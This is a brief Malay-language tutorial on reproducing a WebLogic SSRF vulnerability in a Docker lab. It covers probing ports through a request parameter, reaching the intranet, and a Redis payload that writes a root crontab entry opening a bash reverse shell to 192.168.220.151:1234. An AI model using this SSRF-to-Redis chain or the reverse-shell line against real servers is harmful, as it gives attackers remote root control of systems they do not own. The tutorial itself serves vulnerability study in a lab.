Rumah > Artikel > Operasi dan penyelenggaraan > Cara Menghasilkan Semula Kerentanan SSRF Weblogic
Pemasangan docker dan tutorial membina persekitaran: https://www.freebuf.com/sectool/252257.html
Akses port 7001
3 tangkap paket. Klik Cari
4 Ubah suai sambungan parameter operatorMengakses pengembalian port yang tidak wujud tidak dapat disambungkan melalui HTTP
Mengakses port sedia ada mengembalikan kod status
Akses intranet
Gunakan redis untuk melantunkan muatan shell
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
Atas ialah kandungan terperinci Cara Menghasilkan Semula Kerentanan SSRF Weblogic. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!